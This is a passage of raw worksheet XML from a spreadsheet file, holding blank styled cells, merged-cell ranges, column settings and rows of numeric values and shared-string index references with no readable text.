      <c r="N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3"/>
      <c r="M799" s="24"/>
      <c r="N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3"/>
      <c r="M800" s="24"/>
      <c r="N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3"/>
      <c r="M801" s="24"/>
      <c r="N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3"/>
      <c r="M802" s="24"/>
      <c r="N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3"/>
      <c r="M803" s="24"/>
      <c r="N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3"/>
      <c r="M804" s="24"/>
      <c r="N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3"/>
      <c r="M805" s="24"/>
      <c r="N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3"/>
      <c r="M806" s="24"/>
      <c r="N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3"/>
      <c r="M807" s="24"/>
      <c r="N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3"/>
      <c r="M808" s="24"/>
      <c r="N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3"/>
      <c r="M809" s="24"/>
      <c r="N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3"/>
      <c r="M810" s="24"/>
      <c r="N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3"/>
      <c r="M811" s="24"/>
      <c r="N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3"/>
      <c r="M812" s="24"/>
      <c r="N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3"/>
      <c r="M813" s="24"/>
      <c r="N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3"/>
      <c r="M814" s="24"/>
      <c r="N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3"/>
      <c r="M815" s="24"/>
      <c r="N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3"/>
      <c r="M816" s="24"/>
      <c r="N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3"/>
      <c r="M817" s="24"/>
      <c r="N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3"/>
      <c r="M818" s="24"/>
      <c r="N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3"/>
      <c r="M819" s="24"/>
      <c r="N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3"/>
      <c r="M820" s="24"/>
      <c r="N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3"/>
      <c r="M821" s="24"/>
      <c r="N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3"/>
      <c r="M822" s="24"/>
      <c r="N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3"/>
      <c r="M823" s="24"/>
      <c r="N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3"/>
      <c r="M824" s="24"/>
      <c r="N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3"/>
      <c r="M825" s="24"/>
      <c r="N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3"/>
      <c r="M826" s="24"/>
      <c r="N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3"/>
      <c r="M827" s="24"/>
      <c r="N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3"/>
      <c r="M828" s="24"/>
      <c r="N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3"/>
      <c r="M829" s="24"/>
      <c r="N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3"/>
      <c r="M830" s="24"/>
      <c r="N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3"/>
      <c r="M831" s="24"/>
      <c r="N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3"/>
      <c r="M832" s="24"/>
      <c r="N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3"/>
      <c r="M833" s="24"/>
      <c r="N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3"/>
      <c r="M834" s="24"/>
      <c r="N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3"/>
      <c r="M835" s="24"/>
      <c r="N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3"/>
      <c r="M836" s="24"/>
      <c r="N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3"/>
      <c r="M837" s="24"/>
      <c r="N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3"/>
      <c r="M838" s="24"/>
      <c r="N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3"/>
      <c r="M839" s="24"/>
      <c r="N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3"/>
      <c r="M840" s="24"/>
      <c r="N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3"/>
      <c r="M841" s="24"/>
      <c r="N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3"/>
      <c r="M842" s="24"/>
      <c r="N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3"/>
      <c r="M843" s="24"/>
      <c r="N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3"/>
      <c r="M844" s="24"/>
      <c r="N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3"/>
      <c r="M845" s="24"/>
      <c r="N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3"/>
      <c r="M846" s="24"/>
      <c r="N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3"/>
      <c r="M847" s="24"/>
      <c r="N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3"/>
      <c r="M848" s="24"/>
      <c r="N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3"/>
      <c r="M849" s="24"/>
      <c r="N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3"/>
      <c r="M850" s="24"/>
      <c r="N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3"/>
      <c r="M851" s="24"/>
      <c r="N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3"/>
      <c r="M852" s="24"/>
      <c r="N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3"/>
      <c r="M853" s="24"/>
      <c r="N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3"/>
      <c r="M854" s="24"/>
      <c r="N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3"/>
      <c r="M855" s="24"/>
      <c r="N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3"/>
      <c r="M856" s="24"/>
      <c r="N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3"/>
      <c r="M857" s="24"/>
      <c r="N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3"/>
      <c r="M858" s="24"/>
      <c r="N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3"/>
      <c r="M859" s="24"/>
      <c r="N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3"/>
      <c r="M860" s="24"/>
      <c r="N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3"/>
      <c r="M861" s="24"/>
      <c r="N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3"/>
      <c r="M862" s="24"/>
      <c r="N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3"/>
      <c r="M863" s="24"/>
      <c r="N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3"/>
      <c r="M864" s="24"/>
      <c r="N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3"/>
      <c r="M865" s="24"/>
      <c r="N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3"/>
      <c r="M866" s="24"/>
      <c r="N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3"/>
      <c r="M867" s="24"/>
      <c r="N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3"/>
      <c r="M868" s="24"/>
      <c r="N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3"/>
      <c r="M869" s="24"/>
      <c r="N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3"/>
      <c r="M870" s="24"/>
      <c r="N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3"/>
      <c r="M871" s="24"/>
      <c r="N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3"/>
      <c r="M872" s="24"/>
      <c r="N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3"/>
      <c r="M873" s="24"/>
      <c r="N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3"/>
      <c r="M874" s="24"/>
      <c r="N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3"/>
      <c r="M875" s="24"/>
      <c r="N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3"/>
      <c r="M876" s="24"/>
      <c r="N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3"/>
      <c r="M877" s="24"/>
      <c r="N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3"/>
      <c r="M878" s="24"/>
      <c r="N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3"/>
      <c r="M879" s="24"/>
      <c r="N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3"/>
      <c r="M880" s="24"/>
      <c r="N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3"/>
      <c r="M881" s="24"/>
      <c r="N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3"/>
      <c r="M882" s="24"/>
      <c r="N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3"/>
      <c r="M883" s="24"/>
      <c r="N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3"/>
      <c r="M884" s="24"/>
      <c r="N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3"/>
      <c r="M885" s="24"/>
      <c r="N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3"/>
      <c r="M886" s="24"/>
      <c r="N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3"/>
      <c r="M887" s="24"/>
      <c r="N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3"/>
      <c r="M888" s="24"/>
      <c r="N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3"/>
      <c r="M889" s="24"/>
      <c r="N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3"/>
      <c r="M890" s="24"/>
      <c r="N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3"/>
      <c r="M891" s="24"/>
      <c r="N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3"/>
      <c r="M892" s="24"/>
      <c r="N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3"/>
      <c r="M893" s="24"/>
      <c r="N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3"/>
      <c r="M894" s="24"/>
      <c r="N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3"/>
      <c r="M895" s="24"/>
      <c r="N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3"/>
      <c r="M896" s="24"/>
      <c r="N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3"/>
      <c r="M897" s="24"/>
      <c r="N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3"/>
      <c r="M898" s="24"/>
      <c r="N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3"/>
      <c r="M899" s="24"/>
      <c r="N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3"/>
      <c r="M900" s="24"/>
      <c r="N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3"/>
      <c r="M901" s="24"/>
      <c r="N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3"/>
      <c r="M902" s="24"/>
      <c r="N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3"/>
      <c r="M903" s="24"/>
      <c r="N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3"/>
      <c r="M904" s="24"/>
      <c r="N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3"/>
      <c r="M905" s="24"/>
      <c r="N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3"/>
      <c r="M906" s="24"/>
      <c r="N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3"/>
      <c r="M907" s="24"/>
      <c r="N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3"/>
      <c r="M908" s="24"/>
      <c r="N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3"/>
      <c r="M909" s="24"/>
      <c r="N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3"/>
      <c r="M910" s="24"/>
      <c r="N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3"/>
      <c r="M911" s="24"/>
      <c r="N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3"/>
      <c r="M912" s="24"/>
      <c r="N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3"/>
      <c r="M913" s="24"/>
      <c r="N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3"/>
      <c r="M914" s="24"/>
      <c r="N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3"/>
      <c r="M915" s="24"/>
      <c r="N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3"/>
      <c r="M916" s="24"/>
      <c r="N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3"/>
      <c r="M917" s="24"/>
      <c r="N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3"/>
      <c r="M918" s="24"/>
      <c r="N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3"/>
      <c r="M919" s="24"/>
      <c r="N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3"/>
      <c r="M920" s="24"/>
      <c r="N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3"/>
      <c r="M921" s="24"/>
      <c r="N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3"/>
      <c r="M922" s="24"/>
      <c r="N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3"/>
      <c r="M923" s="24"/>
      <c r="N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3"/>
      <c r="M924" s="24"/>
      <c r="N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3"/>
      <c r="M925" s="24"/>
      <c r="N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3"/>
      <c r="M926" s="24"/>
      <c r="N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3"/>
      <c r="M927" s="24"/>
      <c r="N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3"/>
      <c r="M928" s="24"/>
      <c r="N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3"/>
      <c r="M929" s="24"/>
      <c r="N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3"/>
      <c r="M930" s="24"/>
      <c r="N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3"/>
      <c r="M931" s="24"/>
      <c r="N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3"/>
      <c r="M932" s="24"/>
      <c r="N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3"/>
      <c r="M933" s="24"/>
      <c r="N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3"/>
      <c r="M934" s="24"/>
      <c r="N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3"/>
      <c r="M935" s="24"/>
      <c r="N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3"/>
      <c r="M936" s="24"/>
      <c r="N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3"/>
      <c r="M937" s="24"/>
      <c r="N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3"/>
      <c r="M938" s="24"/>
      <c r="N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3"/>
      <c r="M939" s="24"/>
      <c r="N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3"/>
      <c r="M940" s="24"/>
      <c r="N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3"/>
      <c r="M941" s="24"/>
      <c r="N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3"/>
      <c r="M942" s="24"/>
      <c r="N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3"/>
      <c r="M943" s="24"/>
      <c r="N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3"/>
      <c r="M944" s="24"/>
      <c r="N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3"/>
      <c r="M945" s="24"/>
      <c r="N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3"/>
      <c r="M946" s="24"/>
      <c r="N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3"/>
      <c r="M947" s="24"/>
      <c r="N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3"/>
      <c r="M948" s="24"/>
      <c r="N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3"/>
      <c r="M949" s="24"/>
      <c r="N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3"/>
      <c r="M950" s="24"/>
      <c r="N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3"/>
      <c r="M951" s="24"/>
      <c r="N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3"/>
      <c r="M952" s="24"/>
      <c r="N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3"/>
      <c r="M953" s="24"/>
      <c r="N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3"/>
      <c r="M954" s="24"/>
      <c r="N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3"/>
      <c r="M955" s="24"/>
      <c r="N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3"/>
      <c r="M956" s="24"/>
      <c r="N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3"/>
      <c r="M957" s="24"/>
      <c r="N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3"/>
      <c r="M958" s="24"/>
      <c r="N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3"/>
      <c r="M959" s="24"/>
      <c r="N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3"/>
      <c r="M960" s="24"/>
      <c r="N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3"/>
      <c r="M961" s="24"/>
      <c r="N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3"/>
      <c r="M962" s="24"/>
      <c r="N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3"/>
      <c r="M963" s="24"/>
      <c r="N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3"/>
      <c r="M964" s="24"/>
      <c r="N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3"/>
      <c r="M965" s="24"/>
      <c r="N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3"/>
      <c r="M966" s="24"/>
      <c r="N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3"/>
      <c r="M967" s="24"/>
      <c r="N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3"/>
      <c r="M968" s="24"/>
      <c r="N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3"/>
      <c r="M969" s="24"/>
      <c r="N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3"/>
      <c r="M970" s="24"/>
      <c r="N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3"/>
      <c r="M971" s="24"/>
      <c r="N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3"/>
      <c r="M972" s="24"/>
      <c r="N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3"/>
      <c r="M973" s="24"/>
      <c r="N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3"/>
      <c r="M974" s="24"/>
      <c r="N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3"/>
      <c r="M975" s="24"/>
      <c r="N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3"/>
      <c r="M976" s="24"/>
      <c r="N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3"/>
      <c r="M977" s="24"/>
      <c r="N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3"/>
      <c r="M978" s="24"/>
      <c r="N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3"/>
      <c r="M979" s="24"/>
      <c r="N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3"/>
      <c r="M980" s="24"/>
      <c r="N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3"/>
      <c r="M981" s="24"/>
      <c r="N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3"/>
      <c r="M982" s="24"/>
      <c r="N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3"/>
      <c r="M983" s="24"/>
      <c r="N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3"/>
      <c r="M984" s="24"/>
      <c r="N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3"/>
      <c r="M985" s="24"/>
      <c r="N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3"/>
      <c r="M986" s="24"/>
      <c r="N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3"/>
      <c r="M987" s="24"/>
      <c r="N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3"/>
      <c r="M988" s="24"/>
      <c r="N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3"/>
      <c r="M989" s="24"/>
      <c r="N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3"/>
      <c r="M990" s="24"/>
      <c r="N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3"/>
      <c r="M991" s="24"/>
      <c r="N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3"/>
      <c r="M992" s="24"/>
      <c r="N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3"/>
      <c r="M993" s="24"/>
      <c r="N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3"/>
      <c r="M994" s="24"/>
      <c r="N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3"/>
      <c r="M995" s="24"/>
      <c r="N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3"/>
      <c r="M996" s="24"/>
      <c r="N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3"/>
      <c r="M997" s="24"/>
      <c r="N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3"/>
      <c r="M998" s="24"/>
      <c r="N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3"/>
      <c r="M999" s="24"/>
      <c r="N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3"/>
      <c r="M1000" s="24"/>
      <c r="N1000" s="22"/>
    </row>
  </sheetData>
  <mergeCells count="21">
    <mergeCell ref="C8:C10"/>
    <mergeCell ref="D8:D10"/>
    <mergeCell ref="B2:B4"/>
    <mergeCell ref="C2:C4"/>
    <mergeCell ref="D2:D4"/>
    <mergeCell ref="B5:B7"/>
    <mergeCell ref="C5:C7"/>
    <mergeCell ref="D5:D7"/>
    <mergeCell ref="B8:B10"/>
    <mergeCell ref="C17:C19"/>
    <mergeCell ref="D17:D19"/>
    <mergeCell ref="B20:B22"/>
    <mergeCell ref="C20:C22"/>
    <mergeCell ref="D20:D22"/>
    <mergeCell ref="B11:B13"/>
    <mergeCell ref="C11:C13"/>
    <mergeCell ref="D11:D13"/>
    <mergeCell ref="B14:B16"/>
    <mergeCell ref="C14:C16"/>
    <mergeCell ref="D14:D16"/>
    <mergeCell ref="B17:B1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25"/>
    <col customWidth="1" hidden="1" min="2" max="2" width="7.25"/>
    <col customWidth="1" min="3" max="3" width="6.75"/>
    <col customWidth="1" min="4" max="4" width="16.0"/>
    <col customWidth="1" min="5" max="5" width="10.0"/>
    <col customWidth="1" min="6" max="7" width="23.13"/>
    <col customWidth="1" hidden="1" min="12" max="12" width="36.88"/>
    <col customWidth="1" min="13" max="13" width="84.88"/>
    <col customWidth="1" min="14" max="14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3">
        <v>1.0</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D2" s="3" t="s">
        <v>15</v>
      </c>
      <c r="E2" s="2">
        <v>1.0</v>
      </c>
      <c r="F2" s="4" t="s">
        <v>16</v>
      </c>
      <c r="G2" s="4" t="s">
        <v>17</v>
      </c>
      <c r="H2" s="2">
        <v>1.0</v>
      </c>
      <c r="I2" s="2">
        <v>0.0</v>
      </c>
      <c r="J2" s="2">
        <v>0.0</v>
      </c>
      <c r="K2" s="2">
        <v>0.0</v>
      </c>
      <c r="L2" s="2"/>
      <c r="M2" s="2" t="s">
        <v>18</v>
      </c>
      <c r="N2" s="2"/>
    </row>
    <row r="3">
      <c r="A3" s="2">
        <v>2.0</v>
      </c>
      <c r="E3" s="2">
        <v>2.0</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>19</v>
      </c>
      <c r="G3" s="4" t="s">
        <v>20</v>
      </c>
      <c r="H3" s="2">
        <v>1.0</v>
      </c>
      <c r="I3" s="2">
        <v>0.0</v>
      </c>
      <c r="J3" s="2">
        <v>1.0</v>
      </c>
      <c r="K3" s="2">
        <v>0.0</v>
      </c>
      <c r="L3" s="5"/>
      <c r="M3" s="2" t="s">
        <v>21</v>
      </c>
      <c r="N3" s="5" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2">
        <v>3.0</v>
      </c>
      <c r="E4" s="2">
        <v>3.0</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>23</v>
      </c>
      <c r="G4" s="4" t="s">
        <v>24</v>
      </c>
      <c r="H4" s="2">
        <v>1.0</v>
      </c>
      <c r="I4" s="2">
        <v>0.0</v>
      </c>
      <c r="J4" s="2">
        <v>0.0</v>
      </c>
      <c r="K4" s="2">
        <v>0.0</v>
      </c>
      <c r="L4" s="2"/>
      <c r="M4" s="2" t="s">
        <v>25</v>
      </c>
      <c r="N4" s="2"/>
    </row>
    <row r="5">
      <c r="A5" s="2">
        <v>4.0</v>
      </c>
      <c r="B5" s="3">
        <v>1.0</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E5" s="2">
        <v>1.0</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>27</v>
      </c>
      <c r="G5" s="4" t="s">
        <v>28</v>
      </c>
      <c r="H5" s="2">
        <v>1.0</v>
      </c>
      <c r="I5" s="2">
        <v>0.0</v>
      </c>
      <c r="J5" s="2">
        <v>0.0</v>
      </c>
      <c r="K5" s="2">
        <v>0.0</v>
      </c>
      <c r="L5" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M5" s="2" t="s">
        <v>30</v>
      </c>
      <c r="N5" s="2"/>
    </row>
    <row r="6">
      <c r="A6" s="2">
        <v>5.0</v>
      </c>
      <c r="E6" s="2">
        <v>2.0</v>
      </c>
      <c r="F6" s="4" t="s">
        <v>31</v>
      </c>
      <c r="G6" s="4" t="s">
        <v>32</v>
      </c>
      <c r="H6" s="2">
        <v>1.0</v>
      </c>
      <c r="I6" s="2">
        <v>0.0</v>
      </c>
      <c r="J6" s="2">
        <v>0.0</v>
      </c>
      <c r="K6" s="2">
        <v>0.0</v>
      </c>
      <c r="L6" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M6" s="2" t="s">
        <v>30</v>
      </c>
      <c r="N6" s="2"/>
    </row>
    <row r="7">
      <c r="A7" s="2">
        <v>6.0</v>
      </c>
      <c r="E7" s="2">
        <v>3.0</v>
      </c>
      <c r="F7" s="4" t="s">
        <v>33</v>
      </c>
      <c r="G7" s="4" t="s">
        <v>34</v>
      </c>
      <c r="H7" s="2">
        <v>1.0</v>
      </c>
      <c r="I7" s="2">
        <v>0.0</v>
      </c>
      <c r="J7" s="2">
        <v>0.0</v>
      </c>
      <c r="K7" s="2">
        <v>0.0</v>
      </c>
      <c r="L7" s="5" t="s">
        <v>29</v>
      </c>
      <c r="M7" s="2" t="s">
        <v>30</v>
      </c>
      <c r="N7" s="2"/>
    </row>
    <row r="8">
      <c r="A8" s="2">
        <v>7.0</v>
      </c>
      <c r="B8" s="3">
        <v>1.0</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D8" s="3" t="s">
        <v>35</v>
      </c>
      <c r="E8" s="2">
        <v>1.0</v>
      </c>
      <c r="F8" s="6" t="s">
        <v>36</v>
      </c>
      <c r="G8" s="6" t="s">
        <v>37</v>
      </c>
      <c r="H8" s="2">
        <v>1.0</v>
      </c>
      <c r="I8" s="2">
        <v>0.0</v>
      </c>
      <c r="J8" s="2">
        <v>0.0</v>
      </c>
      <c r="K8" s="2">
        <v>0.0</v>
      </c>
      <c r="L8" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M8" s="2" t="s">
        <v>38</v>
      </c>
      <c r="N8" s="2"/>
    </row>
    <row r="9">
      <c r="A9" s="2">
        <v>8.0</v>
      </c>
      <c r="E9" s="2">
        <v>2.0</v>
      </c>
      <c r="F9" s="6" t="s">
        <v>39</v>
      </c>
      <c r="G9" s="6" t="s">
        <v>40</v>
      </c>
      <c r="H9" s="2">
        <v>1.0</v>
      </c>
      <c r="I9" s="2">
        <v>0.0</v>
      </c>
      <c r="J9" s="2">
        <v>0.0</v>
      </c>
      <c r="K9" s="2">
        <v>0.0</v>
      </c>
      <c r="L9" s="5" t="s">
        <v>29</v>
      </c>
      <c r="M9" s="2" t="s">
        <v>41</v>
      </c>
      <c r="N9" s="2"/>
    </row>
    <row r="10">
      <c r="A10" s="2">
        <v>9.0</v>
      </c>
      <c r="E10" s="2">
        <v>3.0</v>
      </c>
      <c r="F10" s="6" t="s">
        <v>42</v>
      </c>
      <c r="G10" s="6" t="s">
        <v>43</v>
      </c>
      <c r="H10" s="2">
        <v>1.0</v>
      </c>
      <c r="I10" s="2">
        <v>0.0</v>
      </c>
      <c r="J10" s="2">
        <v>0.0</v>
      </c>
      <c r="K10" s="2">
        <v>0.0</v>
      </c>
      <c r="L10" s="2" t="s">
        <v>29</v>
      </c>
      <c r="M10" s="2" t="s">
        <v>41</v>
      </c>
      <c r="N10" s="2"/>
    </row>
    <row r="11">
      <c r="A11" s="2">
        <v>10.0</v>
      </c>
      <c r="B11" s="3">
        <v>1.0</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D11" s="3" t="s">
        <v>44</v>
      </c>
      <c r="E11" s="2">
        <v>1.0</v>
      </c>
      <c r="F11" s="6" t="s">
        <v>45</v>
      </c>
      <c r="G11" s="6" t="s">
        <v>46</v>
      </c>
      <c r="H11" s="2">
        <v>1.0</v>
      </c>
      <c r="I11" s="2">
        <v>0.0</v>
      </c>
      <c r="J11" s="2">
        <v>0.0</v>
      </c>
      <c r="K11" s="2">
        <v>0.0</v>
      </c>
      <c r="L11" s="2" t="s">
        <v>47</v>
      </c>
      <c r="M11" s="2" t="s">
        <v>48</v>
      </c>
      <c r="N11" s="2"/>
    </row>
    <row r="12">
      <c r="A12" s="2">
        <v>11.0</v>
      </c>
      <c r="E12" s="2">
        <v>2.0</v>
      </c>
      <c r="F12" s="6" t="s">
        <v>49</v>
      </c>
      <c r="G12" s="6" t="s">
        <v>50</v>
      </c>
      <c r="H12" s="2">
        <v>1.0</v>
      </c>
      <c r="I12" s="2">
        <v>0.0</v>
      </c>
      <c r="J12" s="2">
        <v>0.0</v>
      </c>
      <c r="K12" s="2">
        <v>0.0</v>
      </c>
      <c r="L12" s="2" t="s">
        <v>51</v>
      </c>
      <c r="M12" s="2" t="s">
        <v>48</v>
      </c>
      <c r="N12" s="2"/>
    </row>
    <row r="13">
      <c r="A13" s="2">
        <v>12.0</v>
      </c>
      <c r="E13" s="2">
        <v>3.0</v>
      </c>
      <c r="F13" s="6" t="s">
        <v>52</v>
      </c>
      <c r="G13" s="6" t="s">
        <v>53</v>
      </c>
      <c r="H13" s="2">
        <v>1.0</v>
      </c>
      <c r="I13" s="2">
        <v>0.0</v>
      </c>
      <c r="J13" s="2">
        <v>0.0</v>
      </c>
      <c r="K13" s="2">
        <v>0.0</v>
      </c>
      <c r="L13" s="2" t="s">
        <v>51</v>
      </c>
      <c r="M13" s="2" t="s">
        <v>48</v>
      </c>
      <c r="N13" s="2"/>
    </row>
    <row r="14">
      <c r="A14" s="2">
        <v>13.0</v>
      </c>
      <c r="B14" s="3">
        <v>1.0</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D14" s="3" t="s">
        <v>54</v>
      </c>
      <c r="E14" s="2">
        <v>1.0</v>
      </c>
      <c r="F14" s="6" t="s">
        <v>55</v>
      </c>
      <c r="G14" s="6" t="s">
        <v>56</v>
      </c>
      <c r="H14" s="2">
        <v>1.0</v>
      </c>
      <c r="I14" s="2">
        <v>0.0</v>
      </c>
      <c r="J14" s="2">
        <v>0.0</v>
      </c>
      <c r="K14" s="2">
        <v>0.0</v>
      </c>
      <c r="L14" s="2" t="s">
        <v>57</v>
      </c>
      <c r="M14" s="2" t="s">
        <v>58</v>
      </c>
      <c r="N14" s="2"/>
    </row>
    <row r="15">
      <c r="A15" s="2">
        <v>14.0</v>
      </c>
      <c r="E15" s="2">
        <v>2.0</v>
      </c>
      <c r="F15" s="6" t="s">
        <v>59</v>
      </c>
      <c r="G15" s="6" t="s">
        <v>60</v>
      </c>
      <c r="H15" s="2">
        <v>1.0</v>
      </c>
      <c r="I15" s="2">
        <v>0.0</v>
      </c>
      <c r="J15" s="2">
        <v>0.0</v>
      </c>
      <c r="K15" s="2">
        <v>0.0</v>
      </c>
      <c r="L15" s="7" t="s">
        <v>61</v>
      </c>
      <c r="M15" s="2" t="s">
        <v>62</v>
      </c>
      <c r="N15" s="2"/>
    </row>
    <row r="16">
      <c r="A16" s="2">
        <v>15.0</v>
      </c>
      <c r="E16" s="2">
        <v>3.0</v>
      </c>
      <c r="F16" s="6" t="s">
        <v>63</v>
      </c>
      <c r="G16" s="6" t="s">
        <v>64</v>
      </c>
      <c r="H16" s="2">
        <v>1.0</v>
      </c>
      <c r="I16" s="2">
        <v>0.0</v>
      </c>
      <c r="J16" s="2">
        <v>0.0</v>
      </c>
      <c r="K16" s="2">
        <v>0.0</v>
      </c>
      <c r="L16" s="2" t="s">
        <v>65</v>
      </c>
      <c r="M16" s="2" t="s">
        <v>66</v>
      </c>
      <c r="N16" s="2"/>
    </row>
    <row r="17">
      <c r="A17" s="2">
        <v>16.0</v>
      </c>
      <c r="B17" s="3">
        <v>1.0</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>14</v>
      </c>
      <c r="D17" s="3" t="s">
        <v>67</v>
      </c>
      <c r="E17" s="2">
        <v>1.0</v>
      </c>
      <c r="F17" s="6" t="s">
        <v>68</v>
      </c>
      <c r="G17" s="6" t="s">
        <v>69</v>
      </c>
      <c r="H17" s="2">
        <v>1.0</v>
      </c>
      <c r="I17" s="2">
        <v>0.0</v>
      </c>
      <c r="J17" s="2">
        <v>0.0</v>
      </c>
      <c r="K17" s="2">
        <v>0.0</v>
      </c>
      <c r="L17" s="2" t="s">
        <v>70</v>
      </c>
      <c r="M17" s="2" t="s">
        <v>71</v>
      </c>
      <c r="N17" s="2"/>
    </row>
    <row r="18">
      <c r="A18" s="2">
        <v>17.0</v>
      </c>
      <c r="E18" s="2">
        <v>2.0</v>
      </c>
      <c r="F18" s="6" t="s">
        <v>72</v>
      </c>
      <c r="G18" s="6" t="s">
        <v>73</v>
      </c>
      <c r="H18" s="2">
        <v>1.0</v>
      </c>
      <c r="I18" s="2">
        <v>0.0</v>
      </c>
      <c r="J18" s="2">
        <v>0.0</v>
      </c>
      <c r="K18" s="2">
        <v>0.0</v>
      </c>
      <c r="L18" s="2" t="s">
        <v>74</v>
      </c>
      <c r="M18" s="2" t="s">
        <v>71</v>
      </c>
      <c r="N18" s="2"/>
    </row>
    <row r="19">
      <c r="A19" s="2">
        <v>18.0</v>
      </c>
      <c r="E19" s="2">
        <v>3.0</v>
      </c>
      <c r="F19" s="6" t="s">
        <v>75</v>
      </c>
      <c r="G19" s="6" t="s">
        <v>76</v>
      </c>
      <c r="H19" s="2">
        <v>1.0</v>
      </c>
      <c r="I19" s="2">
        <v>0.0</v>
      </c>
      <c r="J19" s="2">
        <v>0.0</v>
      </c>
      <c r="K19" s="2">
        <v>0.0</v>
      </c>
      <c r="L19" s="7" t="s">
        <v>77</v>
      </c>
      <c r="M19" s="2" t="s">
        <v>71</v>
      </c>
      <c r="N19" s="2"/>
    </row>
    <row r="20">
      <c r="A20" s="8">
        <v>19.0</v>
      </c>
      <c r="B20" s="9">
        <v>1.0</v>
      </c>
      <c r="C20" s="10" t="s">
        <v>14</v>
      </c>
      <c r="D20" s="11" t="s">
        <v>78</v>
      </c>
      <c r="E20" s="10">
        <v>1.0</v>
      </c>
      <c r="F20" s="12" t="s">
        <v>79</v>
      </c>
      <c r="G20" s="12" t="s">
        <v>80</v>
      </c>
      <c r="H20" s="2">
        <v>1.0</v>
      </c>
      <c r="I20" s="2">
        <v>0.0</v>
      </c>
      <c r="J20" s="2">
        <v>0.0</v>
      </c>
      <c r="K20" s="2">
        <v>0.0</v>
      </c>
      <c r="L20" s="13"/>
      <c r="M20" s="14" t="s">
        <v>81</v>
      </c>
      <c r="N20" s="15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</row>
    <row r="21">
      <c r="A21" s="8">
        <v>20.0</v>
      </c>
      <c r="E21" s="10">
        <v>2.0</v>
      </c>
      <c r="F21" s="12" t="s">
        <v>82</v>
      </c>
      <c r="G21" s="12" t="s">
        <v>83</v>
      </c>
      <c r="H21" s="2">
        <v>1.0</v>
      </c>
      <c r="I21" s="2">
        <v>0.0</v>
      </c>
      <c r="J21" s="2">
        <v>0.0</v>
      </c>
      <c r="K21" s="2">
        <v>0.0</v>
      </c>
      <c r="L21" s="13"/>
      <c r="M21" s="14" t="s">
        <v>84</v>
      </c>
      <c r="N21" s="15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</row>
    <row r="22">
      <c r="A22" s="8">
        <v>21.0</v>
      </c>
      <c r="E22" s="10">
        <v>3.0</v>
      </c>
      <c r="F22" s="12" t="s">
        <v>85</v>
      </c>
      <c r="G22" s="12" t="s">
        <v>86</v>
      </c>
      <c r="H22" s="2">
        <v>1.0</v>
      </c>
      <c r="I22" s="2">
        <v>0.0</v>
      </c>
      <c r="J22" s="2">
        <v>0.0</v>
      </c>
      <c r="K22" s="2">
        <v>0.0</v>
      </c>
      <c r="L22" s="13"/>
      <c r="M22" s="14" t="s">
        <v>111</v>
      </c>
      <c r="N22" s="13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</row>
    <row r="23">
      <c r="A23" s="17">
        <v>22.0</v>
      </c>
      <c r="B23" s="17">
        <v>1.0</v>
      </c>
      <c r="C23" s="17" t="s">
        <v>88</v>
      </c>
      <c r="D23" s="18" t="s">
        <v>89</v>
      </c>
      <c r="E23" s="17">
        <v>1.0</v>
      </c>
      <c r="F23" s="17" t="s">
        <v>90</v>
      </c>
      <c r="G23" s="17" t="s">
        <v>91</v>
      </c>
      <c r="H23" s="2">
        <v>0.0</v>
      </c>
      <c r="I23" s="2">
        <v>0.0</v>
      </c>
      <c r="J23" s="2">
        <v>0.0</v>
      </c>
      <c r="K23" s="2">
        <v>2.0</v>
      </c>
      <c r="L23" s="19"/>
      <c r="M23" s="20" t="s">
        <v>92</v>
      </c>
      <c r="N23" s="21"/>
    </row>
    <row r="24">
      <c r="A24" s="17">
        <v>23.0</v>
      </c>
      <c r="B24" s="17">
        <v>1.0</v>
      </c>
      <c r="C24" s="17" t="s">
        <v>88</v>
      </c>
      <c r="D24" s="18" t="s">
        <v>89</v>
      </c>
      <c r="E24" s="17">
        <v>2.0</v>
      </c>
      <c r="F24" s="17" t="s">
        <v>93</v>
      </c>
      <c r="G24" s="17" t="s">
        <v>94</v>
      </c>
      <c r="H24" s="2">
        <v>0.0</v>
      </c>
      <c r="I24" s="2">
        <v>0.0</v>
      </c>
      <c r="J24" s="2">
        <v>0.0</v>
      </c>
      <c r="K24" s="2">
        <v>2.0</v>
      </c>
      <c r="L24" s="19"/>
      <c r="M24" s="20" t="s">
        <v>95</v>
      </c>
      <c r="N24" s="21"/>
    </row>
    <row r="25">
      <c r="A25" s="17">
        <v>24.0</v>
      </c>
      <c r="B25" s="17">
        <v>1.0</v>
      </c>
      <c r="C25" s="17" t="s">
        <v>88</v>
      </c>
      <c r="D25" s="18" t="s">
        <v>89</v>
      </c>
      <c r="E25" s="17">
        <v>3.0</v>
      </c>
      <c r="F25" s="17" t="s">
        <v>96</v>
      </c>
      <c r="G25" s="17" t="s">
        <v>97</v>
      </c>
      <c r="H25" s="2">
        <v>0.0</v>
      </c>
      <c r="I25" s="2">
        <v>0.0</v>
      </c>
      <c r="J25" s="2">
        <v>0.0</v>
      </c>
      <c r="K25" s="2">
        <v>2.0</v>
      </c>
      <c r="L25" s="19"/>
      <c r="M25" s="20" t="s">
        <v>98</v>
      </c>
      <c r="N25" s="21"/>
    </row>
    <row r="26">
      <c r="A26" s="17">
        <v>25.0</v>
      </c>
      <c r="B26" s="17">
        <v>1.0</v>
      </c>
      <c r="C26" s="17" t="s">
        <v>88</v>
      </c>
      <c r="D26" s="18" t="s">
        <v>89</v>
      </c>
      <c r="E26" s="17">
        <v>4.0</v>
      </c>
      <c r="F26" s="17" t="s">
        <v>99</v>
      </c>
      <c r="G26" s="17" t="s">
        <v>100</v>
      </c>
      <c r="H26" s="2">
        <v>0.0</v>
      </c>
      <c r="I26" s="2">
        <v>0.0</v>
      </c>
      <c r="J26" s="2">
        <v>0.0</v>
      </c>
      <c r="K26" s="2">
        <v>2.0</v>
      </c>
